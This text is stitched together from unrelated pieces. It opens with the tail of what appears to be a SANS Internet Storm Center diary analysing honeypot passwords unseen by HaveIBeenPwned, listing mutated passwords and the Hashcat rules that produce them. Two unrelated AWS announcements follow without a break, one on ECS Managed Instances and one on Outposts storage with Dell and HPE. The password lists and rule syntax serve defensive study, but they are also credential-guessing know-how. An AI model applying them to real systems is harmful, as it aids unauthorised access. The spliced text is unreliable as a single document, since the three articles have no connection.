The script runs 5 minutes after the JQ command to ensure there is more than enough time to create the input file. Since there is a limit on how long logs are retained, there are no concerns about this ever starting to take longer.

I chose this method over adding parsing functionality to the script out of convenience. Doing it in the script would require additional logic and either hardcoding locations to check for logs or dealing with more arguments. As designed, anyone can easily plug in a list of passwords without having to worry about many command line options or editing the script.

Results

The script accurately provides information on passwords that HaveIBeenPwned has not seen in prior breaches. While there were more unseen passwords than one may expect (1,196 or ~7.4% of all unique passwords as of writing), it provides interesting insight into what some actors may be targeting. The results also reveal patterns for password mutations that are being leveraged for access attempts:

deploy12345
deploy123456
deploy1234567
deploy12345678
deploy@2022
deploy@2023
deploy@2025
deploy2025
deploy@321
deploypass
P@$$vords123
P@$sw0rd#
P4$$word!@#
P455wORd
P@55W0RD2004
Pa$$word2016!
pa33w0rd!@
Pa55w0rd@2021
passw0rd!@#$
pass@w0rd.12345
passwd@123!
PaSswORD@123
password@2!@
PaSswORd2021
password!2024
password!2025
Password43213
password!@#456

Password Patterns & Analysis

Analyzing the passwords seen in the above Results section can provide some insight into what techniques are being used to generate passwords.

Consider the above sample of results. Broadly speaking, this “deploy family” of passwords was likely generated by starting with a base password of “deploy” and adding common modifiers to increase complexity. Seen here are good examples of the simplest ones: adding the year (with an @ sign in this case) and adding sequential numbers.

The rest of the entries above are all based on the word ‘password’. These are more complex than what we saw with ‘deploy’. Below are three entries, a plain explanation of a Hashcat rule that could be used to come up with it, and a sample implementation of the rule:

  • P4$$word!@#
    • Capitalize the first letter, replace a’s with 4’s, replace s’s with $’s, add !@# to end – c sa4 ss$ $! $@ $#
  • P@55W0RD2004
    • Replace a’s with @’s, s’s with 5’s, and o’s with 0’s, then capitalize all letters and add a year to the end – sa@ ss5 so0 u $2 $0 $0 $4
  • Password!2024
    • Capitalize the first letter, add ! and a year to the end – t0 $! $2 $0 $2 $4

Both Hashcat and John the Ripper can make these modifications by using rules to augment password lists. The rules allow various changes to input such as replacing or swapping certain characters with others. Note that while much of the rules syntax between these tools is similar, there are some differences [5].
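
To sanity-check the first rule above, here is a small Python equivalent of those Hashcat operations (illustrative only; actual cracking runs would use rule files directly):

def apply_rule(word: str) -> str:
    word = word[0].upper() + word[1:].lower()  # c: capitalize first letter
    word = word.replace("a", "4")              # sa4
    word = word.replace("s", "$")              # ss$
    return word + "!@#"                        # $! $@ $#

print(apply_rule("password"))  # P4$$word!@#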

Looking through the unseen passwords, we can also see more specific targets such as Elasticsearch, Oracle, PostgreSQL, and Ubuntu. Figure 5 shows some of these passwords, which use the same kinds of modifications mentioned earlier and illustrate the relative difference in frequency.


Figure 5: Passwords related to specific services/platforms.

Overall Takeaway

While a good amount of manual analysis will still be required, these results can provide a lot of value and the script helps cut down on time. We can learn more about common password modifications to avoid and even get an idea of the relative interest in different targets. In Figure 5 alone, we can see that PostgreSQL may be roughly two times more likely to be targeted than Elasticsearch, with newer installations being targeted in particular.

For future work, I would add a feature to recheck the known unseen passwords to identify if they happen to be newly breached.

Additionally, I may consider adding two features for convenience. The first would be re-sorting the unseen file, since it is append-only. The second would be parsing features to simplify automation and allow the script to provide more functionality for end users.

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://haveibeenpwned.com/API/v3#PwnedPasswords
[3] https://github.com/MeepStryker/queryHIBP
[4] https://haveibeenpwned.com/API/v3#UserAgent
[5] https://hashcat.net/wiki/doku.php?id=rule_based_attack#compatibility_with_other_rule_engines

 


Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Announcing Amazon ECS Managed Instances for containerized applications

Today, we’re announcing Amazon ECS Managed Instances, a new compute option for Amazon Elastic Container Service (Amazon ECS) that enables developers to use the full range of Amazon Elastic Compute Cloud (Amazon EC2) capabilities while offloading infrastructure management responsibilities to Amazon Web Services (AWS). This new offering combines the operational simplicity of offloading infrastructure management with the flexibility and control of Amazon EC2, which means customers can focus on building applications that drive innovation while reducing total cost of ownership (TCO) and maintaining AWS best practices.

Customers running containerized workloads told us they want to combine the simplicity of serverless with the flexibility of self-managed EC2 instances. Although serverless options provide an excellent general-purpose solution, some applications require specific compute capabilities, such as GPU acceleration, particular CPU architectures, or enhanced networking performance. Additionally, customers with existing Amazon EC2 capacity investments through EC2 pricing options couldn’t fully use these commitments with serverless offerings.

Amazon ECS Managed Instances provides a fully managed container compute environment that supports a broad range of EC2 instance types and deep integration with AWS services. By default, it automatically selects the most cost-optimized EC2 instances for your workloads, but you can specify particular instance attributes or types when needed. AWS handles all aspects of infrastructure management, including provisioning, scaling, security patching, and cost optimization, enabling you to concentrate on building and running your applications.

Let’s try it out

Looking at the AWS Management Console experience for creating a new Amazon ECS cluster, I can see the new option for using ECS Managed Instances. Let’s take a quick tour of all the new options.

Creating an ECS cluster with Managed Instances

After I’ve selected Fargate and Managed Instances, I’m presented with two options. If I select Use ECS default, Amazon ECS chooses general purpose instance types by grouping pending tasks together and picking the optimal instance type based on cost and resilience metrics. This is the most straightforward and recommended way to get started. Selecting Use custom – advanced opens up additional configuration parameters, where I can fine-tune the attributes of the instances Amazon ECS will use.

Creating an ECS cluster with Managed Instances

By default, I see CPU and Memory as attributes, but I can select from 20 additional attributes to further filter the list of instance types Amazon ECS can use.

Creating an ECS cluster with Managed Instances

After I’ve made my attribute selections, I see a list of all the instance types that match my choices.

Creating an ECS cluster with Managed Instances

From here, I can create my ECS cluster as usual, and Amazon ECS will provision instances on my behalf based on the attributes and criteria I defined in the previous steps.

Key features of Amazon ECS Managed Instances

With Amazon ECS Managed Instances, AWS takes full responsibility for infrastructure management, handling all aspects of instance provisioning, scaling, and maintenance. This includes implementing regular security patches initiated every 14 days (due to instance connection draining, the actual lifetime of the instance may be longer), with the ability to schedule maintenance windows using Amazon EC2 event windows to minimize disruption to your applications.

The service provides exceptional flexibility in instance type selection. Although it automatically selects cost-optimized instance types by default, you maintain the power to specify desired instance attributes when your workloads require specific capabilities. This includes options for GPU acceleration, CPU architecture, and network performance requirements, giving you precise control over your compute environment.

To help optimize costs, Amazon ECS Managed Instances intelligently manages resource utilization by automatically placing multiple tasks on larger instances when appropriate. The service continually monitors and optimizes task placement, consolidating workloads onto fewer instances so that idle (empty) instances can be drained and terminated, providing both high availability and cost efficiency for your containerized applications.

Integration with existing AWS services is seamless, particularly with Amazon EC2 features such as EC2 pricing options. This deep integration means that you can maximize existing capacity investments while maintaining the operational simplicity of a fully managed service.

Security remains a top priority with Amazon ECS Managed Instances. The service runs on Bottlerocket, a purpose-built container operating system, and maintains your security posture through automated security patches and updates. You can see all the updates and patches applied to the Bottlerocket OS image on the Bottlerocket website. This comprehensive approach to security keeps your containerized applications running in a secure, maintained environment.

Available now

Amazon ECS Managed Instances is available today in the US East (N. Virginia), US West (Oregon), Europe (Dublin), Africa (Cape Town), Asia Pacific (Singapore), and Asia Pacific (Tokyo) AWS Regions. You can start using Managed Instances through the AWS Management Console, AWS Command Line Interface (AWS CLI), or infrastructure as code (IaC) tools such as AWS Cloud Development Kit (AWS CDK) and AWS CloudFormation. You pay for the EC2 instances you use plus a management fee for the service.

To learn more about Amazon ECS Managed Instances, visit the documentation and get started simplifying your container infrastructure today.

Announcing AWS Outposts third-party storage integration with Dell and HPE

Since announcing second-generation AWS Outposts racks in April with breakthrough performance and scalability, we’ve continued to innovate on behalf of our customers at the edge of the cloud. Today, we’re expanding the AWS Outposts third-party storage integration program to include Dell PowerStore and HPE Alletra Storage MP B10000 systems, joining existing integrations with NetApp on-premises enterprise storage arrays and Pure Storage FlashArray. This program makes it easy for customers to use AWS Outposts with third-party storage arrays through AWS native tooling. The integration is particularly important for organizations migrating VMware workloads to AWS that need to maintain their existing storage infrastructure during the transition, and for those who must meet strict data residency requirements by keeping data on premises while using AWS services.

This announcement builds upon two significant storage integration milestones we achieved in the past year. In December 2024, we introduced the ability to attach block data volumes from third-party storage arrays to Amazon EC2 instances on Outposts directly through the AWS Management Console. Then in July 2025, we enabled booting Amazon EC2 instances directly from these external storage arrays. Now, with the addition of Dell and HPE, customers have even more choice in how they integrate their on-premises storage investments with AWS Outposts.

Enhanced storage integration capabilities

Our third-party storage integration supports both data and boot volumes, offering two boot methods: iSCSI SANboot and Localboot. The iSCSI SANboot option enables both read-only and read-write boot volumes, while Localboot supports read-only boot volumes using either iSCSI or NVMe-over-TCP protocols. With this comprehensive approach, customers can centrally manage their storage resources while maintaining the consistent hybrid experience that Outposts provides.

Through the Amazon EC2 Launch Instance Wizard in the AWS Management Console, customers can configure their instances to use external storage from any of our supported partners. For boot volumes, we provide AWS-verified AMIs for Windows Server 2022 and Red Hat Enterprise Linux 9, with automation scripts available through AWS Samples to simplify the setup process.

Support for various Outposts configurations

All third-party storage integration features are supported on Outposts 2U servers and both generations of Outposts racks. Support for second-generation Outposts racks means customers can combine the enhanced performance of our latest EC2 instances on Outposts—including twice the vCPU, memory, and network bandwidth—with their preferred storage solutions. The integration works seamlessly with both our new simplified network scaling capabilities and specialized Amazon EC2 instances designed for ultra-low latency and high throughput workloads.

Things to know

Customers can begin using these capabilities today with their existing Outposts deployments or when ordering new Outposts through the AWS Management Console. If you are using third-party storage integration with Outposts servers, you can have either your onsite personnel or a third-party IT provider install the servers for you. After the Outposts servers are connected to your network, AWS will remotely provision compute and storage resources so you can start launching applications. For Outposts rack deployments, the process involves a setup where AWS technicians verify site conditions and network connectivity before the rack installation and activation. Storage partners assist with the implementation of the third-party storage components.

Third-party storage integration for Outposts with all compatible storage vendors is available at no additional charge in all AWS Regions where Outposts is supported. See the FAQs for Outposts servers and Outposts racks for the latest list of supported Regions.

This expansion of our Outposts third-party storage integration program demonstrates our continued commitment to providing flexible, enterprise-grade hybrid cloud solutions, meeting customers where they are in their cloud migration journey. To learn more about this capability and our supported storage vendors, visit the AWS Outposts partner page and our technical documentation for Outposts servers, second-generation Outposts racks, and first-generation Outposts racks. To learn more about partner solutions, check out Dell PowerStore integration with AWS Outposts and HPE Alletra Storage MP B10000 integration with AWS Outposts.